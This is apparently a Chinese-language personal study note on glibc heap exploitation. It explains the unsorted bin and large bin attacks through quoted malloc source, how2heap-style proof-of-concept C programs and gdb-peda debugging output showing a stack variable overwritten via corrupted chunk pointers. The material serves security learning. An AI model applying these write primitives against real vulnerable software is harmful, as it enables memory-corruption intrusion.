本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。
若有图片及文稿引用,将在本篇结尾处著名来源(也有置于篇首的情况)。
目录
范例代码:(howtoheap2——unsorted_bin_attack)
参考文章:
同样先引用如下两篇文章。如果读者能够通过如下三篇文章掌握Large Bin Attack,那么本篇便只是附带品,没有什么其他内容
https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/large-bin-attack/
https://bbs.pediy.com/thread-262424.htm
条件背景:
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize_nomask (victim)
> av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
size = chunksize (victim);
/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/
if (in_smallbin_range (nb) &&
bck == unsorted_chunks (av) &&
victim == av->last_remainder &&
(unsigned long) (size) > (unsigned long) (nb + MINSIZE))
{
/* split and reattach remainder */
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks (av);
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
/* Take now instead of binning if exact fit */
if (size == nb)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
/* place chunk in bin */
if (in_smallbin_range (size))
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert (chunk_main_arena (bck->bk));
if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))
{
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert (chunk_main_arena (fwd));
while ((unsigned long) size < chunksize_nomask (fwd))
{
fwd = fwd->fd_nextsize;
assert (chunk_main_arena (fwd));
}
if ((unsigned long) size == (unsigned long) chunksize_nomask (fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}
该代码主要阐述:当管理器从Unsorted Bin中取出chunk置入对应Bins的时,如何判断置入何处、做出哪些相应修改。
如果读者并不熟悉这段代码,并对其中的变量名感到困惑,可以暂且搁置,笔者将在后续补充这些内容以方便理解该代码。
前置知识:
- Unsorted Bin是先进后出(在两个chunk都满足malloc请求时先操作后入的)
- Unsorted Bin是无序且紧凑的,放入该结构中的相邻chunk将被合并且直接放入头部
- Large Bins的链表是有序的,排序规则为降序
- 了解bk_nextsize、fd_nextsize、bk、fd指针的指向目标
- 待补充
Unsorted Bin Attack:
在解释Large Bin Attack之前,我觉得有必要先从Unsorted Bin Attack开始。笔者认为这将有助于读者理解之后的内容。如下内容摘自:CTF-WIKI
概述
Unsorted Bin Attack 该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关
Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针
Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值(该值不可控)
范例代码:(howtoheap2——unsorted_bin_attack)
#include <stdio.h>
#include <stdlib.h>
int main(){
unsigned long stack_var=0;
unsigned long *p=malloc(400);
malloc(500);
free(p);
p[1]=(unsigned long)(&stack_var-2);
malloc(400);
}
笔者删去了所有的fprintf以让上述代码看起来更加整洁,读者可以自行对代码进行调整
代码调试:
运行上述程序到第13行;第二次malloc将 p 与Top chunk隔离,使其在free(p)时不会直接被并入Top chunk
此时的Bins中为:
gdb-peda$ bins
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x602000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602000
对于不使用Fast Bins的chunk来说,在free时会先将其置入Unsorted Bin中
由于用户没有将 p 指针置NULL,因此我们能够通过操作 p 指针来改变 chunk的数据(14行)
gdb-peda$ heap
0x602000 PREV_INUSE {
prev_size = 0x0,
size = 0x1a1,
fd = 0x7ffff7dd1b78 <main_arena+88>,
bk = 0x7fffffffde08,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
如上是修改后的 chunk p
其bk被指向了栈中的某个位置
而在第15行将申请一个0x400大小的chunk,刚好能够由 p 分配,则管理器将其从Bin中取出,此时发生了Unsorted Bin Attack,我们可以从条件背景中摘录部分关键代码来解释这个现象:
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
注:unsorted_chunks (av)返回指向 Unsorted Bin表头的指针,其bk指针指向最后一个节点
注:victim表示Unsorted Bin中最后一个节点
注:此处的bck = victim->bk;
该段代码作用为:
- 将倒数第二个节点作为最后一个节点
- 将倒数第二个节点的下一个节点指向表头
正常的操作当然不会引发问题,这两个操作成功将最后一个节点从Unsorted Bin中摘除
但范例中的bck=&stack_var-2,如果此时调用malloc,则摘除 chunk p ,触发上述情况
bck->fd处将被写入表头地址,这个地址并不是我们能够控制的,只能表示一个较大的值罢了
在用于修改一些长度限制时有奇效,但除此之外似乎并没有特别的用处
gdb-peda$ p stack_var
$1 = 0x7ffff7dd1b78
0x602000 PREV_INUSE {
prev_size = 0x0,
size = 0x1a1,
fd = 0x7ffff7dd1b78 <main_arena+88>,
bk = 0x7fffffffde08,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
可以发现,这个值stack_var的值被写为了表头地址
Large Bin Attack:
比起说明,笔者认为直接用代码更加便于理解
下示范例摘自参考文章第一个链接中的范例
范例代码:
#include<stdio.h>
#include<stdlib.h>
int main()
{
unsigned long *p1, *p2, *p3, *p4, *p5, *p6, *p7, *p8, *p9, *p10, *p11, *p12;
unsigned long *p;
unsigned long stack[8] = {0};
printf("stack address: %p\n", &stack);
p1 = malloc(0x3f0);
p2 = malloc(0x20);
p3 = malloc(0x400);
p4 = malloc(0x20);
p5 = malloc(0x400);
p6 = malloc(0x20);
p7 = malloc(0x120);
p8 = malloc(0x20);
p9 = malloc(0x140);
p10 = malloc(0x20);
p11 = malloc(0x400);
p12 = malloc(0x20);
free(p7);
free(p9);
p = malloc(0x60);
p = malloc(0xb0);
free(p1);
free(p3);
free(p5);
p = malloc(0x60);
free(p11);
//step 2-3-2-1
//*(p1-1) = 0x421;
//p = malloc(0x60);
//step 2-3-2-2-1
//p = malloc(0x60);
//step 2-3-2-2-2
//*(p3-1) = 0x3f1;
//p = malloc(0x60);
// Attack part
/*
*(p3-1) = 0x3f1;
*(p3) = (unsigned long)(&stack);
*(p3+1) = (unsigned long)(&stack);
*(p3+2) = (unsigned long)(&stack);
*(p3+3) = (unsigned long)(&stack);
// trigger malicious malloc
p = malloc(0x60);
*/
return 0;
}
代码调试:
首先断点定于25行,此时的Unsorted Bins中已放入p7,p9
unsortedbin
all: 0x602e10 —▸ 0x602cb0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602e10
smallbins
empty
gdb-peda$ p p7
$1 = (unsigned long *) 0x602cc0
gdb-peda$ p p9
$2 = (unsigned long *) 0x602e20
0x602cb0 PREV_INUSE {
prev_size = 0x0,
size = 0x131,
fd = 0x7ffff7dd1b78 <main_arena+88>,
bk = 0x602e10,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
0x602e10 PREV_INUSE {
prev_size = 0x0,
size = 0x151,
fd = 0x602cb0,
bk = 0x7ffff7dd1b78 <main_arena+88>,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
当用户malloc(0x60)时候,将把p7取出并切割分配给用户,并将剩余部分重新放回Unsorted Bin,再往前将其他块(此处为p9)放入对应的Bins中,
unsortedbin
all: 0x602d20 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602d20 /* ' -`' */
smallbins
0x150: 0x602e10 —▸ 0x7ffff7dd1cb8 (main_arena+408) ◂— 0x602e10
这里有几个细节需要注意:
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
如上是条件背景第一行,它将victim定为链表的最后一个单元,这意味着Unsorted Bin是从后往前遍历的(因此是先p7,再p9)
p7是小于p9的,它在Small Bin数组中应该位于索引较低的链表上;而申请结束后,p9被放入Small Bin,而p7被切割后放回Unsorted Bin,这意味着Small Bin是从低索引往高索引遍历的
注:有一个名为mark_bin (av, victim_index)的函数,它会将以victim_index为索引的chunk标记为”有空闲块“,因此扫描时总是先扫描该Bin有无空闲块,然后再往下
unsortedbin
all: 0x0
smallbins
0x150: 0x602e10 —▸ 0x7ffff7dd1cb8 (main_arena+408) ◂— 0x602e10
再一次申请,由于刚好大小符合Unsorted Bin,因此直接摘除
接下来一直运行到第32行:
unsortedbin
all: 0x602870 —▸ 0x602430 —▸ 0x602000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602870 /* 'p(`' */
smallbins
0x150: 0x602e10 —▸ 0x7ffff7dd1cb8 (main_arena+408) ◂— 0x602e10
largebins
empty
p1、p3、p5都比较大,属于Large Bin的范畴,而再次申请后的Bins将如下:
unsortedbin
all: 0x602e80 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602e80
smallbins
empty
largebins
0x400: 0x602430 —▸ 0x602870 —▸ 0x602000 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x602430 /* '0$`' */
可以看见,顺序为p2——>p3——>p1,且存放在同一个Large Bin中(Large Bin有六十多个)
他们实则是降序排列的,但p2和p3由于大小相同,似乎不太好分辨相同size时该如何处理,这个疑问将在接下来注释的代码段中阐明,暂且继续往下:
unsortedbin
all: 0x602f90 —▸ 0x602e80 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602f90
smallbins
empty
largebins
0x400: 0x602430 —▸ 0x602870 —▸ 0x602000 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x602430 /* '0$`' */
gdb-peda$ p p11
$3 = (unsigned long *) 0x602fa0
free(p11)后Bins的情况如上
step 2-3-2-1:
现在,我们将代码中注释的step 2-3-2-1下两行解开,重新编译,进入第37行的情况:
gdb-peda$ heap
0x602000 PREV_INUSE {
prev_size = 0x0,
size = 0x421,
fd = 0x7ffff7dd1f68 <main_arena+1096>,
bk = 0x602870,
fd_nextsize = 0x602430,
bk_nextsize = 0x602430
}
我们发现,其修改了chunk p1的size,而此时的chunk p1正被挂在Large Bin 中的最后一个节点上,当我们再次malloc时候,将得到如下的Bin:
unsortedbin
all: 0x602ef0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602ef0
smallbins
empty
largebins
0x400: 0x602430 —▸ 0x602870 —▸ 0x602000 —▸ 0x602f90 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— ...
我们按照顺序标记出Large Bin中四个节点的大小:0x411、0x411、0x421、0x411
p11被挂到了最后,且p1也没有挂到前面去,这种现象是由于管理机制的漏洞所致:
堆管理器会默认当前Index下的链表的最后一个就是最小的块,然后把要放入的块和其比较,如果比当前最小块还小,那就直接放在最后,并直接返回了
因此篡改了本例种最后一个节点p1的大小,使得整个链表的“最小块”的尺寸增大,以至于出现上述现象
step 2-3-2-2-1:
现在注释掉step 2-3-2-1并解开step 2-3-2-2-1,重新编译并运行到41行
unsortedbin
all: 0x602ef0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602ef0
smallbins
empty
largebins
0x400: 0x602430 —▸ 0x602f90 —▸ 0x602870 —▸ 0x602000 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— ...
0x602f90 的Size也为0x411,它大于最小的块,因此将从该Index的链表头部开始往下遍历,并发现第一个节点的Size与其相同,于是直接将该节点放在第二个节点的位置,其他节点顺位往下
step 2-3-2-2-2:
注释掉step 2-3-2-2-1并解开step 2-3-2-2-2
程序在第44行篡改了第一个节点的Size,使其小于将要插入的块
于是当我们检索发现要插入的块其Size大于最小块,从头开始遍历,又发现其大于第一个节点,于是就将自己作为了新的头节点
unsortedbin
all: 0x602ef0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602ef0
smallbins
empty
largebins
0x400: 0x602f90 —▸ 0x602430 —▸ 0x602870 —▸ 0x602000 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— ...
Attack part:
最后,我们注释掉step 2-3-2-2-2,并解开Attack part的注释重新编译并运行到第49行
49至53行,代码篡改了chunk p3的内容,直接运行到54行,查看p3结构:
0x602840 PREV_INUSE {
prev_size = 0x0,
size = 0x3f1,
fd = 0x7fffffffdde0,
bk = 0x7fffffffdde0,
fd_nextsize = 0x7fffffffdde0,
bk_nextsize = 0x7fffffffdde0
}
当我们再次执行malloc时候,将会在该链表头部插入新的节点
此时,由于我们对原本的头部进行了数据的篡改,将导致堆地址的泄露
其原理与第四章所写的Unlink攻击有些相似
我们先从条件背景中摘抄出本范例在最后一个malloc时候会发生的事情:
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
}
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
- victim为将要插入的chunk
- fwd为 下一个小于victim的节点
- bck见代码第8行(将会指向Bins的表头)
- victim_index表示victim将要放入的Bin的索引
本例中,victim为 chunk p11,fwd将为chunk p3,bck则为&stack
在第6行处,将在(&stack+4)处写入victim的堆地址
在最后一行,将在(&stack+2)处写入victim的堆地址
gdb-peda$ p &stack
$5 = (unsigned long (*)[8]) 0x7fffffffdde0
gdb-peda$ x /10gx 0x7fffffffdde0
0x7fffffffdde0: 0x0000000000000000 0x0000000000000000
0x7fffffffddf0: 0x00000000006033a0 0x0000000000000000
0x7fffffffde00: 0x00000000006033a0 0x0000000000000000
0x7fffffffde10: 0x0000000000000000 0x0000000000000000
0x7fffffffde20: 0x00007fffffffdf10 0x131d22806a239e00
Large Bin Attack至此成功